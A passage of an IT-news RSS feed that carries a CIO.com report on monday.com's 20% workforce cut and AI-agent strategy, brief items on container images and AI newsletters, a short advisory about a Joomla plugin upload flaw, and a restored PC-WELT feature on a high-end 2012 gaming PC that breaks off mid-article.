<p class="wp-block-paragraph">Going forward, buyers should focus on operating risk, not headline risk, Moor’s Brue noted. In practice, that’s continuity of service, roadmap consistency, and strength of enterprise support. Productivity should be valued as better outcomes per unit of organizational effort, not mere activity.</p>



<p class="wp-block-paragraph">“It should be a measure of how much smoother, faster, and more effective the operating model becomes when AI is built into the work,” said Brue.</p>



<p class="wp-block-paragraph">Gogia noted that strain surfaces first in customer service, and monday.com’s attention is being redistributed. The company’s annual report disclosed that its focus is now concentrated on the largest accounts, with support for medium-sized clients moved to an AI-first and human-supported model.</p>



<p class="wp-block-paragraph">During the first month of the transition, buyers should track named account continuity and escalation times, he advised. By the first quarter, keep an eye on whether credit governance and admin controls mature on schedule, and if the roadmap beyond the AI estate keeps pace. By the half-year mark, determine whether promised implementation depth is producing outcomes or “simply more billable engagement.”</p>



<p class="wp-block-paragraph">Support tiers should be enumerated in writing before renewal, and <a href="https://www.cio.com/article/4192312/4-recs-for-cios-to-optimize-ai-budgets-and-improve-sustainability.html" target="_blank">buyers should contract</a> for “side exits,” Gogia emphasized, with overage pricing fixed in advance, the right to pause consumption, and portability for workflows and agent configuration “if the relationship sours.” Finance should also insist on monthly consumption reporting by capability. Further, integration efforts, partner dependency, and change management should be considered first-class costs of the agent era, “not as afterthoughts to a license.”</p>



<p class="wp-block-paragraph">“A license was a known cost,” said Gogia. “A meter is a behavior, and behavior is harder to forecast than headcount.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4200330/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era.html" target="_blank">CIO.com</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Monday.com cuts 20% of its workforce to restructure for the AI era]]></title>
<description><![CDATA[Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.



Monday.com co-founder and co-CEO Eran Zinman tod...]]></description>
<link>https://tsecurity.de/de/3687828/it-security-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687828/it-security-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</guid>
<pubDate>Thu, 23 Jul 2026 02:50:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.</p>



<p class="wp-block-paragraph">Monday.com co-founder and co-CEO Eran Zinman <a href="https://www.linkedin.com/pulse/building-mondaycom-its-next-chapter-eran-zinman-cxx4e/" target="_blank" rel="noreferrer noopener">today announced</a> the “very difficult decision” to reduce the AI work platform company’s global workforce by about 20%, or 620 people.</p>



<p class="wp-block-paragraph">The move has nothing to do with increasing margins or replacing humans with AI, he insisted in his post on LinkedIn; rather, it’s a calculated decision to trim down and hone the company’s focus as AI becomes integral to day-to-day workflows.</p>



<p class="wp-block-paragraph">“This is not a distress signal; it is a deliberate reset, disclosed with its price attached,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “The industry has quietly swapped the meaning of productivity, and this filing is the clearest exhibit yet.”</p>



<h2 class="wp-block-heading">A ‘significant opportunity’ in technology</h2>



<p class="wp-block-paragraph">In a <a href="https://www.sec.gov/Archives/edgar/data/1845338/000117891326003553/zk2635715.htm" target="_blank" rel="noreferrer noopener">SEC filing</a> this week, monday.com said its restructuring plan reflects the “ongoing transformation of its product, marketing, and go-to-market strategy.” The move is intended to support a “leaner, more focused operating model” as the company continues to invest in its AI-driven strategy.</p>



<p class="wp-block-paragraph">Zinman noted in his post that the company has shifted to “doing the work with AI and not just managing it,” and is focused on building environments where “people and <a href="https://www.cio.com/article/411198/how-to-launch-your-ai-projects-from-pilot-to-production-and-ensure-success.html" target="_blank">AI agents</a> [work] together in one workspace.”</p>



<p class="wp-block-paragraph">In recent months, monday.com has <a href="https://www.computerworld.com/article/3822438/monday-com-aims-to-be-an-ai-first-platform-with-latest-enhancements.html" target="_blank">evolved its products</a>, strategy, and the way it serves its customers, and Zinman contended that “the organization we built for our previous chapter is not the organization that fits the new AI era.” Monday.com needs to “execute more decisively,” take on new challenges, and quickly respond to market changes, he said.</p>



<p class="wp-block-paragraph">“We have never seen such a significant opportunity in software, driven by such exciting technology,” Zinman noted. He emphasized that the reduction is not to replace people with AI, nor to improve margins; the “vast majority” of savings will be reinvested into talent, products, and AI.</p>



<p class="wp-block-paragraph">The restructuring will result in a “flatter organization” with fewer management layers and smaller, more autonomous teams, and monday.com also has a new go-to-market model, Zinman explained. Customers expect “deeper implementation support” as they deploy AI, and the company will work more closely with customers, increase its on-site presence, create new roles, and “adapt many existing ones.” In its SEC filing, the company said it expects to continue hiring in “key strategic areas” throughout 2026.</p>



<p class="wp-block-paragraph">Workers will be expected to work better, “not harder,” Zinman noted. He pointed to several past examples where work could have been done in a few days, but instead took many months with “multiple meetings and endless friction.”</p>



<p class="wp-block-paragraph">“This wasn’t people’s fault and everyone was frustrated by this,” he said. “Our new org changes ownership to allow people to make decisions and move fast.”</p>



<p class="wp-block-paragraph">A spokesperson for monday.com declined to comment further on the staff reductions.</p>



<h2 class="wp-block-heading">Monday’s key market advantages</h2>



<p class="wp-block-paragraph">Monday.com certainly isn’t struggling; the company expects 19% to 20% year-over-year growth in 2026.</p>



<p class="wp-block-paragraph">“Companies in that position do not restructure because they must,” Greyhound’s Gogia noted. “They restructure because they have decided to become something else.”</p>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/melody-brue/" target="_blank" rel="noreferrer noopener">Melody Brue</a>, VP and principal analyst at Moor Insights &amp; Strategy, pointed out that organizational redesign is important for real AI transformation, but while it can signal confidence to the market, it can still be “devastating” to humans.</p>



<p class="wp-block-paragraph">While the company looks as though it’s trying to do right, that ultimately remains to be seen, she said. “There are often hidden internal bruises that can surface long after layoffs.”</p>



<p class="wp-block-paragraph">Monday.com’s advantage is in its “structured substrate,” Gogia noted; its boards, permissions and typed workflows give agents something firmer to act on than just documents and chat history. The company highlights its natively built agents that can be configured by any team member, as well as connectors with Claude, Microsoft Copilot, and ChatGPT, and dedicated routes for external agents to authenticate and operate.</p>



<p class="wp-block-paragraph">“For some time, the sharper enterprise question has been shifting from who has an agent to who owns the governed runtime in which an agent can safely act,” he said. “Structured work is a serious claim on that runtime.”</p>



<p class="wp-block-paragraph">But parts of monday.com’s agent estate remain in staged release, and its product is ultimately “mid-transition,” Gogia pointed out; its agent builder carried a beta label as recently as March,. Also, the company’s pricing model changed in May to a hybrid model charging for seats as well as mandatory AI credits. And, while its AI-powered no-code builder monday vibe passed $1 million in annual recurring revenue within two and a half months, monday.com has not released subsequent outcomes, usage volumes, or attach rates.</p>



<p class="wp-block-paragraph">Further, there’s an element of “gravity” with its competitors, he observed. Asana is reorganizing teams around agents, Atlassian is wiring agents into the developer estate, and others are simply bundling them into their offerings: Microsoft is doing so across the productivity stack, and ServiceNow across enterprise operations, each with identity and procurement built in.</p>



<p class="wp-block-paragraph">“Their pull is strongest exactly where monday.com wants to grow, in the largest accounts, where control-plane depth and administrative reach decide the deal,” said Gogia.</p>



<h2 class="wp-block-heading">Actions for the near-term</h2>



<p class="wp-block-paragraph">Going forward, buyers should focus on operating risk, not headline risk, Moor’s Brue noted. In practice, that’s continuity of service, roadmap consistency, and strength of enterprise support. Productivity should be valued as better outcomes per unit of organizational effort, not mere activity.</p>



<p class="wp-block-paragraph">“It should be a measure of how much smoother, faster, and more effective the operating model becomes when AI is built into the work,” said Brue.</p>



<p class="wp-block-paragraph">Gogia noted that strain surfaces first in customer service, and monday.com’s attention is being redistributed. The company’s annual report disclosed that its focus is now concentrated on the largest accounts, with support for medium-sized clients moved to an AI-first and human-supported model.</p>



<p class="wp-block-paragraph">During the first month of the transition, buyers should track named account continuity and escalation times, he advised. By the first quarter, keep an eye on whether credit governance and admin controls mature on schedule, and if the roadmap beyond the AI estate keeps pace. By the half-year mark, determine whether promised implementation depth is producing outcomes or “simply more billable engagement.”</p>



<p class="wp-block-paragraph">Support tiers should be enumerated in writing before renewal, and <a href="https://www.cio.com/article/4192312/4-recs-for-cios-to-optimize-ai-budgets-and-improve-sustainability.html" target="_blank">buyers should contract</a> for “side exits,” Gogia emphasized, with overage pricing fixed in advance, the right to pause consumption, and portability for workflows and agent configuration “if the relationship sours.” Finance should also insist on monthly consumption reporting by capability. Further, integration efforts, partner dependency, and change management should be considered first-class costs of the agent era, “not as afterthoughts to a license.”</p>



<p class="wp-block-paragraph">“A license was a known cost,” said Gogia. “A meter is a behavior, and behavior is harder to forecast than headcount.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Container-Images ohne CVEs: BellSofts neuer Buildpacks-Builder]]></title>
<description><![CDATA[BellSofts gehärteter Builder für Paketo Buildpacks baut Container-Images auf einer weitgehend CVE-freien Alpaquita-Basis – ganz ohne Dockerfile.]]></description>
<link>https://tsecurity.de/de/3686334/it-nachrichten/container-images-ohne-cves-bellsofts-neuer-buildpacks-builder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686334/it-nachrichten/container-images-ohne-cves-bellsofts-neuer-buildpacks-builder/</guid>
<pubDate>Wed, 22 Jul 2026 14:47:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[BellSofts gehärteter Builder für Paketo Buildpacks baut Container-Images auf einer weitgehend CVE-freien Alpaquita-Basis – ganz ohne Dockerfile.]]></content:encoded>
</item>
<item>
<title><![CDATA[10 Newsletters Keeping You Ahead in AI]]></title>
<description><![CDATA[Cut through AI noise with 10 curated newsletters covering daily news, technical research, policy, and builder tools.]]></description>
<link>https://tsecurity.de/de/3686230/ai-nachrichten/10-newsletters-keeping-you-ahead-in-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686230/ai-nachrichten/10-newsletters-keeping-you-ahead-in-ai/</guid>
<pubDate>Wed, 22 Jul 2026 14:11:04 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cut through AI noise with 10 curated newsletters covering daily news, technical research, policy, and builder tools.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-63048 | joomlack.fr Page Builder CK Plugin up to 3.6.2 unrestricted upload (EUVD-2026-47618)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in joomlack.fr Page Builder CK Plugin up to 3.6.2. Affected by this vulnerability is an unknown functionality of the component Page Builder. The manipulation results in unrestricted upload.

This vulnerability is reported as CVE-2026-63...]]></description>
<link>https://tsecurity.de/de/3686050/sicherheitsluecken/cve-2026-63048-joomlackfr-page-builder-ck-plugin-up-to-362-unrestricted-upload-euvd-2026-47618/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686050/sicherheitsluecken/cve-2026-63048-joomlackfr-page-builder-ck-plugin-up-to-362-unrestricted-upload-euvd-2026-47618/</guid>
<pubDate>Wed, 22 Jul 2026 13:03:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/joomlack">joomlack.fr Page Builder CK Plugin up to 3.6.2</a>. Affected by this vulnerability is an unknown functionality of the component <em>Page Builder</em>. The manipulation results in unrestricted upload.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-63048">CVE-2026-63048</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Vier Grafikkarten, sechs CPU-Kerne: So sah vor 14 Jahren die Höllenmaschine 4 aus]]></title>
<description><![CDATA[Hinweis: Dieser Artikel erschien im März 2007 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der Wayback Machine des Internet Archive das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen...]]></description>
<link>https://tsecurity.de/de/3685665/it-nachrichten/vier-grafikkarten-sechs-cpu-kerne-so-sah-vor-14-jahren-die-hoellenmaschine-4-aus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685665/it-nachrichten/vier-grafikkarten-sechs-cpu-kerne-so-sah-vor-14-jahren-die-hoellenmaschine-4-aus/</guid>
<pubDate>Wed, 22 Jul 2026 10:34:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hinweis: Dieser Artikel erschien im März 2007 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der <a href="https://web.archive.org/" target="_blank" rel="noreferrer noopener">Wayback Machine des Internet Archive</a> das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen.</p>



<p>Hier geht es direkt zum <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">Gewinnspiel der aktuellen Höllenmaschine HMX 6 im Gesamtwert von 40.000 Euro</a>. Bestens informiert bleiben Sie mit unserem <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen. Und nun viel Spaß mit der vierten Höllenmaschine:</p>



<p>Die PC-WELT Höllenmaschine 4 repräsentiert den Stand der PC-Technik. Die beste Hard- und Software ist gerade gut genug für den ultimativen Rechnertraum. Auch die vierte Generation im Wert von 13.333 Euro können Sie wieder gewinnen.</p>



<p>Das Rückgrat des 22 Kilogramm schweren <a href="https://web.archive.org/web/20120907053335/http://www.coolermaster.de/product.php?category_id=18&amp;product_id=6767">Cooler Master Cosmos II</a> bildet eine massive Stahlkonstruktion. Zu den Besonderheiten des 300 Euro teuren Big-Towers gehören eine zentrale Lüftersteuerung, Kabelmanagement, Flügeltüren und massig Platz: Das Gehäuse besitzt allein elf Laufwerksschächte für 3,5-Zoll-Festplatten und nimmt Hauptplatinen bis zum E-ATX-Formfaktor auf.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Airbrush der Höllenmaschine 4</h2>



<p>Für das lodernde Airbrush und das seitliche Sichtfenster der Höllenmaschine 4 zeichnen sich die Casemodder Martin und Stefan Blass verantwortlich. Sein höllisch gutes Aussehen verdankt das Gehäuse den international bekannten Casemoddern Martin und Stefan Blass. Auf ihrer <a href="https://web.archive.org/web/20120707010431/http://babetech.de/">Website</a> können Sie sich von den Fähigkeiten der kunstfertigen Casemodder überzeugen. Das preisgekrönte Brüderpaar kümmert sich nicht nur um das teuflische Airbrush und bauliche Veränderungen wie das seitliche Sichtfenster, sondern zeichnet sich auch für die Innenbeleuchtung der Gehäusemodifikation verantwortlich.</p>



<p>Die Gebrüder haben für den schönen Schein einen <a href="https://web.archive.org/web/20100211155227/http://www.leds-and-more.de/catalog/product_info.php?products_id=1128">Multidimmer von Richter</a> eingebaut, der LED-Ketten im Gehäuseinnenraum und im Bodenbereich ansteuert. Über die beiliegende Fernbedienung wählen Sie zwischen acht verschiedenen Grundfarben aus, regulieren die Helligkeit und definieren individuelle Farbwechsel.</p>



<p>Bei der Asus Rampage IV Extreme paart sich eine erlesene Hauptplatinen-Ausstattung mit einem detailverliebten UEFI-Bios, das keine Wünsche offen lässt: Die Sockel-LGA2011-Hauptplatine basiert auf dem Intel-Chipsatz X79. Das UEFI-Motherboard besitzt je acht Speicherbänke, SATA- und USB-Ports sowie fünfmal 16x PCI-Express 3.0. Zur Sonderausstattung gehören CMOS-, Start- und Reset-Knopf, Diagnose-LED, Bluetooth-Unterstützung und umfassende Übertaktungsoptionen, die sich zudem in Echtzeit überwachen lassen.</p>



<h2 class="wp-block-heading toc">Prozessor: die schnellste Desktop-CPU der Welt</h2>



<p>Der <a href="https://web.archive.org/web/20130510132630/http://www.pcwelt.de/produkte/CPU-mit-Rekordtempo-Intel-Core-i7-3960X-Extreme-Edition-im-Test-3907870.html">Intel Core i7-3960X</a> ist der aktuell schnellste Desktop-Prozessor im Test. Das Intel-Flaggschiff besitzt sechs CPU-Kerne und arbeitet dank Hyperthreading als virtueller 12‑Kern‑Prozessor. Der Werkstakt liegt bei 3,3 Gigahertz, in der Höllenmaschine 4 läuft der Core i7 mit 4 GHz. Berechnungen puffert der 3960X in einem dreistufigen Cache-System: So ist die dritte Cache-Stufe, die alle Prozessorkerne dynamisch nutzen können, 15 MB mächtig. Auf die erste und zweite Cache-Stufe mit 64 beziehungsweise 256 KB darf hingegen jeder CPU-Kern exklusiv zugreifen.</p>



<p>Eine der wichtigsten exklusiven Funktionen der LGA2011-Baureihe ist der integrierte Speicher-Controller, der vier DDR3-Kanäle gleichzeitig ansteuert. Ebenfalls in der CPU verbaut sind 40 PCI-Express-3.0-Kanäle. Zur weiteren Ausstattung gehören der Schutz vor Angriffen durch einen Puffer-Überlauf (XD-Bit), zusätzliche Befehlssätze wie SSE 4.2 und das Advanced Encryption Standard Instruction Set (AES IS) sowie die Advanced Vector Extensions (AVX). Zudem unterstützt der Prozessor die Virtualisierungs-Technik Intel VT sowie 32- und 64-Bit-Betriebssysteme – so lassen sich etwa virtuelle Workstations mit unterschiedlichen Betriebssystemen einrichten.</p>



<p>Die Wasserkühlung Cooler Master Eisberg 240L Prestige gibt die CPU-Abwärme über einen Dual-Radiator an die Außenwelt ab, der zwei 120-Millimeter-Lüfter beherbergt. Das Rotationstempo der mit knapp 21 dB(A) sehr leisen Lüfter liegt bei 1600 Umdrehungen pro Minute. Im Microchannel-Kühlblock arbeitet deutsche Pumpentechnik, die bis zu 400 Liter pro Stunde durch das Kühlsystem schleudert und für mindestens 50 000 Betriebsstunden ausgelegt ist. Der keramikbeschichtete Pumpenantrieb dreht sich mit bis zu 3600 Rotationen pro Minute.</p>



<h2 class="wp-block-heading toc">Grafik: 2x ASUS GTX690-4GD5 im Quad-SLI</h2>



<p>Um die Grafikdarstellung kümmert sich in der Höllenmaschine 4 die derzeit leistungsfähigste Grafikkarte der Welt, die <a href="https://web.archive.org/web/20121015164916/http://www.asus.com/Graphics_Cards/NVIDIA_Series/GTX6904GD5/">ASUS GTX690-4GD5</a>. Kostenpunkt: knapp 1000 Euro pro Stück. Die Karte beherbergt mit der <a href="https://web.archive.org/web/20121006082219/http://www.pcwelt.de/produkte/Grafikkarte-Nvidia-Geforce-GTX-690-im-Test-5780074.html">Nvidia Geforce GTX 690</a> gleich zwei 915 Megahertz schnelle Grafikprozessoren, die gemeinsam die 3D-Berechnung übernehmen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a22aec"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/ASUS-GTX690-4GD5-im-Quad-SLI.jpg?quality=50&amp;strip=all" alt="2x ASUS GTX690-4GD5 im Quad-SLI in der Höllenmaschine 4" class="wp-image-3188925" width="900" height="608" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Quad-SLI in der Höllenmaschine 4 mit zwei ASUS GTX690-4GD5</figcaption></figure><p class="imageCredit">PC-WELT</p></div>



<p>In der Höllenmaschine 4 sind gleich zwei der Asus-Doppeldecker, die über eine SLI-Brücke (Scalable Link Interface) verbunden sind. So arbeiten insgesamt vier Grafikprozessoren parallel im Quad-SLI-Modus. In der Summe stehen damit die Rechen-Power von 6144 Shader- und 512 Textur-Einheiten sowie 128 Rasteroperatoren bereit. Dabei kann der Karten-Verbund auf 4 Gigabyte GDDR5-Videospeicher zugreifen, der mit einem effektiven Datentakt von 6000 MHz arbeitet. Jede Grafikkarte besitzt mit einem Mini-Displayport und dreimal DVI vier digitale Ausgänge.</p>



<h2 class="wp-block-heading toc">Ausstattung der Höllenmaschine 4 im Überblick</h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><th>Komponente</th><th>Modell</th><th>Preis (Euro) <strong>am 31.8.2012</strong></th></tr><tr><td>Gehäuse</td><td>Casemod auf Basis des Cooler Master Cosmos II</td><td>1413</td></tr><tr><td>Hauptplatine</td><td>Asus Rampage IV Extreme, Intel X79, LGA2011</td><td>350</td></tr><tr><td>Prozessor</td><td>Intel Core i7-3960X, 3,30 GHz, 6 Kerne, 12 Theads</td><td>900</td></tr><tr><td>CPU-Kühlung</td><td>Cooler Master Eisberg 240L Prestige</td><td>180</td></tr><tr><td>Arbeitsspeicher</td><td>8 x 8 GB Adata XPG X Series PC3-17066U</td><td>880</td></tr><tr><td>Grafikkarte</td><td>2 x Asus GTX690-4GD5, Nvidia Geforce GTX 690</td><td>2000</td></tr><tr><td>Bildschirme</td><td>3 x ASUS VG278H, 27 Zoll, 3D-LED-LCD,</td><td>1550</td></tr><tr><td>SSD (System)</td><td>OCZ RevoDrive 3 X2 480GB, PCI-Express, 4fach Raid-0</td><td>650</td></tr><tr><td>Festplatten (Daten intern)</td><td>4 x Western Digital VelociRaptor 1000GB, Raid-5</td><td>1000</td></tr><tr><td>Festplatten (Daten extern)</td><td>2 x Western Digital Caviar Green 3000GB</td><td>300</td></tr><tr><td>Blu-ray-Brenner</td><td>Asus BW-12B1ST, SATA</td><td>100</td></tr><tr><td>Netzteil</td><td>Cooler Master Silent Pro Hybrid 1300W</td><td>250</td></tr><tr><td>Eingabegerät</td><td>Logitech G9x Laser Mouse und G19 Gaming Keyboard</td><td>200</td></tr><tr><td>Lautsprecher-Set</td><td>Logitech Z906, 5.1 System</td><td>250</td></tr><tr><td>Headset</td><td>Logitech G930 Wireless Gaming Headset</td><td>150</td></tr><tr><td>Betriebssystem</td><td>Microsoft Windows 7 Ultimate 64 Bit</td><td>160</td></tr><tr><td>Multimedia-Paket</td><td>Adobe Creative Suite 6 Design &amp; Web Premium</td><td>2000</td></tr><tr><td>Spiele-Paket</td><td>18 Top-Titel</td><td>600</td></tr><tr><td>Office-Paket</td><td>Microsoft Office Professional 2010</td><td>400</td></tr></tbody></table></figure>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a2346d"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/pc-welt-hoellenmaschine-4-von-links-mit-offener-fluegeltuer.jpg?quality=50&amp;strip=all" alt="Höllenmaschine 4 mit geöffneter Flügeltür" class="wp-image-3188918" width="1024" height="768" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PC-WELT</p></div>



<h2 class="wp-block-heading toc">Monitore: PC-Spiele in 3D auf 3 Panels gleichzeitig</h2>



<p>Der Höllenmaschine 4 stellen wir den 27-Zoll-Bildschirm <a href="https://web.archive.org/web/20120620023231if_/http://www.asus.de/Display/LCD_Monitors/VG278H">ASUS VG278H</a> zur Seite. Die physikalische Auflösung des 120-Hertz-Monitors beträgt 1920 x1080 Pixel, die Reaktionszeit 2 Millisekunden. Die LED-Hintergrundbeleuchtung erzielt eine Helligkeit von 300 cd/m2 und unterstützt die Lightboost-Technik und damit natürlich auch <a href="https://web.archive.org/web/20120905172245/http://www.pcwelt.de/produkte/Test-Nvidia-3D-Vision-2-4158397.html">Nvidia 3D Vision 2</a> – eine Technologie, die das Spielen in der dritten Dimension möglich macht. Im Lieferumfang des Asus-LCDs ist das “Nvidia 3D Vision”-Set aus Infrarot-Sender (integriert im Bildschirmrahmen) und Shutter-Brille enthalten. Der VG278H bietet mit DVI, HDMI und D-Sub drei Videoeingänge sowie einen Kopfhöreranschluss.</p>



<p>Ein großer 27-Zoll-Monitor ist gut, doch drei ASUS VG278H sind besser. Die gebündelte Auflösung des Bildschirm-Trios von 5760 x 1080 Pixeln erlaubt einen Desktop, auf dem sich bequem arbeiten lässt: Da kann man zahlreiche Fenster in ihrer vollen Größe geöffnet lassen, und behält dennoch den Überblick. Interessant ist diese große Arbeitsumgebung auch für Grafiker und Video-Bearbeiter, die dadurch gleich mehrere Projekte am Laufen halten, ohne eines schließen zu müssen.</p>



<p>Ernsthaften PC-Spielern kann dagegen die Bildschirmgröße nicht groß genug sein – denn sie bedeutet größere Übersicht und ein realistischeres Spielerlebnis. So füllt etwa die wunderschöne Landschaft in Skyrim die volle Breite der drei Monitore aus und wirkt dadurch schon fast wie ein echter Horizont, der Lust auf das Erkunden macht. Dank der brachialen Leistung der Höllenmaschine 4 und <a href="https://web.archive.org/web/20120825211507/http://www.nvidia.de/object/3d-vision-surround-requirements-de.html">Nvidia 3D Vision Surround</a> geht das auch flüssig in stereoskopischem 3D.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Arbeitsspeicher: Quad-Channel mit 64 Gigabyte</h2>



<p>Speicher kann man nie genug haben! Die acht Module Adata XPG X Series PC3-17066U mit jeweils 8 Gigabyte Kapazität steuert der Controller in der Intel-CPU im Vierkanal-Modus an. Die Module laufen mit 10-11-11-30er-Zugriffszeiten. Der mit dem Extreme Memory Profile (XMP) effektiv 2133 Megahertz schnelle Arbeitsspeicher beschert der Höllenmaschine 4 eine Speicherbandbreite von über 45 Gigabyte pro Sekunde. Da macht Virtualisierung so richtig Spaß.</p>



<h2 class="wp-block-heading toc">PCI-Express-SSD, 4 WD VelociRaptor und 4 WD Caviar Green </h2>



<p>Das Betriebssystem und alle Programme dürfen auf der Solid State Drive OCZ RevoDrive 3 X2 480GB Platz nehmen. Die Flashspeicher-Festplatte arbeitet mit vier Sandforce-SF-2281-Controllern intern als Raid-0-Verbund. Dadurch erreicht die SSD eine Datentransferrate von in der Spitze fast 1400 Megabyte pro Sekunde und einen Befehlsdurchsatz von bis zu 230.000 IOPS beim zufälligen Schreiben von 4-KB-Blöcken. Eine herkömmliche SATA-Schnittstelle würde das OCZ-Modell ausbremsen, deswegen setzt das RevoDrive auf einen PCI-Express-Anschluss.</p>


